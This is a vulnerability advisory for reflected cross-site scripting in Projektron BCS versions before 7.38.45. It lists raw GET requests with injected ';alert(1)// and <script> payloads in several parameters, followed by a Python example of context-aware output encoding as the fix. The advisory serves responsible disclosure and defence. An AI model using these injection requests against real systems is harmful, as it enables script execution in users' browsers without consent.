usd-2018-0018 | Projektron BCS / All versions before 7.38.45


Advisory ID: usd-2018-0018
CVE Number: N/A
Affected Product: Projektron BCS
Affected Version: All versions before 7.38.45
Vulnerability Type: Reflected XSS
Security Risk: High
Vendor URL: https://www.projektron.de/bcs/
Vendor Status: Fixed
Description

Reflected XSS attacks (also called non-persistent XSS) occur when a malicious script is reflected off a web application into the victim's browser. The attack is typically delivered via email or a website and triggered through a link, which sends a request to a vulnerable site that then returns the malicious script so that it executes in the victim's browser.

Proof of Concept (PoC)

The 'editor', 'oidnamefield' and 'oidfield' parameters of /bcs/eventdeputydetail are vulnerable to XSS.

GET /bcs/multioidselection/*/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&_pcc_mode_=Target&editor=TokenInput39390'%3balert(1)%2f%2f152&oidfield=eventdetail%2Csupporter%2Csupporter&oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&transactionId=1503060134184-40619437911778866 HTTP/1.1

GET /bcs/multioidselection/*/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&_pcc_mode_=Target&editor=TokenInput&oidfield=eventdetail%2csupporter%2csupporter51042'%3balert(1)%2f%2f430&oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&transactionId=1503060134184-40619437911778866 HTTP/1.1

GET /bcs/multioidselection/*/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&_pcc_mode_=Target&editor=TokenInput&oidfield=eventdetail%2Csupporter%2Csupporter&oidnamefield=eventdetail%2csupporter%2csupporter_entitynames14437'%3balert(1)%2f%2f761&transactionId=1503060134184-40619437911778866 HTTP/1.1

Second Proof of Concept

The 'description', 'InitialApplyButtonsOnError' and 'HighlightedApplyButtonsOnError' parameters of /bcs/eventdeputydetail are vulnerable to XSS.

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2cApply76429'%3balert(1)%2f%2f411vxq6nz&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2cApply11494'%3balert(1)%2f%2f133etp0ac&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

Fix

Make sure to encode user-supplied input before it is reflected into the response, using the output encoding appropriate to the context in which it is rendered.
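The PoC requests reflect input into two different output contexts: a JavaScript string literal (the `';alert(1)//` payloads in editor, oidfield, oidnamefield and the ApplyButtonsOnError parameters) and an HTML text node (the `<script>` payload in description). The example below, added here and not code from Projektron BCS, contrasts raw concatenation with context-appropriate encoding for both cases; the page template, the reduced sample requests and the `breaks_out` check are constructed for illustration, since the real BCS markup is not known.

```python
"""Context-aware output encoding for the two reflection contexts in the advisory."""
import html
import json
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests, cut down to the parameters that carry the payload.
# The payload strings are the ones from the advisory's PoC requests.
REQUESTS = [
    "/bcs/multioidselection/*/display?editor=TokenInput39390'%3balert(1)%2f%2f152"
    "&oidfield=eventdetail%2Csupporter%2Csupporter",
    "/bcs/eventdeputydetail/main/edit?eventdetail%2Cdescription%2Cdescription="
    "rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok",
]

def params(url: str) -> dict:
    """URL-decode the query string once, as the application server would."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query,
                                         keep_blank_values=True).items()}

def js_string(value: str) -> str:
    """Encode for a <script> context: JSON-quote, then escape the characters
    that could still close the string or the script block inside HTML."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"),
                    ("'", "\\u0027"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out

def render_vulnerable(p: dict) -> str:
    """Raw concatenation into a JS string literal and an HTML text node (hypothetical template)."""
    editor = p.get("editor", "")
    desc = p.get("eventdetail,description,description", "")
    return (f"<script>var editor = '{editor}';</script>\n"
            f"<div class=\"description\">{desc}</div>")

def render_fixed(p: dict) -> str:
    """Same template, each value encoded for the context it lands in."""
    editor = js_string(p.get("editor", ""))
    desc = html.escape(p.get("eventdetail,description,description", ""), quote=True)
    return (f"<script>var editor = {editor};</script>\n"
            f"<div class=\"description\">{desc}</div>")

def breaks_out(page: str) -> bool:
    """Naive check: did the data terminate the JS string or land as a live tag?"""
    return "';alert(1)" in page or "<script>alert(1)</script>" in page

if __name__ == "__main__":
    for url in REQUESTS:
        p = params(url)
        print("vulnerable:", breaks_out(render_vulnerable(p)),
              "| fixed:", breaks_out(render_fixed(p)))
```

The encoded output still contains the literal text `alert(1)`, which is the point: the data is preserved for display but can no longer change the structure of the script or the markup.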

Timeline

  • 2017-09-15 – First contact request
  • 2017-09-19 – Vendor accepts all reported issues
  • 2018-04-06 – Vendor provides a new release 7.38.45
  • 2018-06-06 – Security advisory released

Credits

These security vulnerabilities were found by Stefan Schmer of usd AG.